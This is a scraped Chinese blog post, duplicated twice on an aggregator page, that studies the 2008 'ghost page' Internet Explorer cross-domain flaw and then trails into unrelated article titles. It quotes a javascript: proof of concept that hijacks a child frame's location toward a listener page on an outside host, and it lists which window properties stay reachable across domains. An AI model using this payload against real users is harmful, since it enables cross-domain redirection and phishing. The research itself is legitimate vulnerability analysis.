“鬼页” 继续
来源:互联网 发布:海棠村掘尸案 知乎 编辑:程序博客网 时间:2024/05/18 01:25
为了不落后,也学习下鬼页。
先看下POC
http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
代码:
处于好奇和进一步发掘我们遍历了这个 ‘x’ 对象。
代码
结果:
名称值onbeforeunloadnullonafterprintnulltop[object]location
parent[object]offscreenBufferingAccess is denied. frameElementAccess is denied. onerrornullscreenAccess is denied. eventAccess is denied. clipboardDataAccess is denied. onresizenulldefaultStatusAccess is denied. onblurnullwindow[object]onloadnullonscrollnullscreenTopAccess is denied. onfocusnullOptionAccess is denied. length0onbeforeprintnullframes[object]self[object]clientInformationAccess is denied. XMLHttpRequestAccess is denied. externalAccess is denied. screenLeftAccess is denied. openerundefinedonunloadnulldocumentAccess is denied. closedfalsehistoryAccess is denied. ImageAccess is denied. navigatorAccess is denied. statusAccess is denied. onhelpnullnameAccess is denied. 除开 on开头的一些事件外,只有下面几个可以使用。
top[object]location
parent[object]window[object]length0closedfalse也就是说 POC代码中的x.frames[0].location 有据可依。我们继续测试下是否只有 '鬼页'的
x.frames[0].location 可控制呢,简单修改下代码遍历 iframe 对象:
同样得到可访问对象 location
top[object]location
parent[object]
新的POC:
最后的测试结果是 在IE7/6 可以用本文提到的方式控制子frame的 location ,却无法执行伪协议,待进一步测试。
先看下POC
http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
代码:
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);QZ说 这段代码展示了跨域操作location ,事实也是。
处于好奇和进一步发掘我们遍历了这个 ‘x’ 对象。
代码
结果:
名称值onbeforeunloadnullonafterprintnulltop[object]location
parent[object]offscreenBufferingAccess is denied. frameElementAccess is denied. onerrornullscreenAccess is denied. eventAccess is denied. clipboardDataAccess is denied. onresizenulldefaultStatusAccess is denied. onblurnullwindow[object]onloadnullonscrollnullscreenTopAccess is denied. onfocusnullOptionAccess is denied. length0onbeforeprintnullframes[object]self[object]clientInformationAccess is denied. XMLHttpRequestAccess is denied. externalAccess is denied. screenLeftAccess is denied. openerundefinedonunloadnulldocumentAccess is denied. closedfalsehistoryAccess is denied. ImageAccess is denied. navigatorAccess is denied. statusAccess is denied. onhelpnullnameAccess is denied. 除开 on开头的一些事件外,只有下面几个可以使用。
top[object]location
parent[object]window[object]length0closedfalse也就是说 POC代码中的x.frames[0].location 有据可依。我们继续测试下是否只有 '鬼页'的
x.frames[0].location 可控制呢,简单修改下代码遍历 iframe 对象:
同样得到可访问对象 location
top[object]location
parent[object]
新的POC:
最后的测试结果是 在IE7/6 可以用本文提到的方式控制子frame的 location ,却无法执行伪协议,待进一步测试。
- “鬼页” 继续
- 继续
- 继续
- 继续
- 继续
- 继续
- 继续~~
- 继续
- 继续
- 继续
- 继续
- 继续
- 继续
- 继续?
- 继续
- 继续...
- 继续。。。
- 继续。。
- 算法设计
- linux下压缩/解压命令
- 如何配置Windows Live Writer发布博客园随笔
- 小小的总结.
- 面向对象的三个基本特征
- “鬼页” 继续
- 学编程好累,头发都会白....
- 应用Wmware workstation 组建自己的局域网
- Sql Server 2005 与Sql Server Mobile(Sql server 2005 mobile Edition)数据同步步骤以及问题解决方案
- 通过FTP服务的winsockes录制脚本
- 十天学会单片机和C语言编程
- mysqldump及相关mysql知识
- LoadRunner 培训心得
- 采用独立的网络保证数据库安全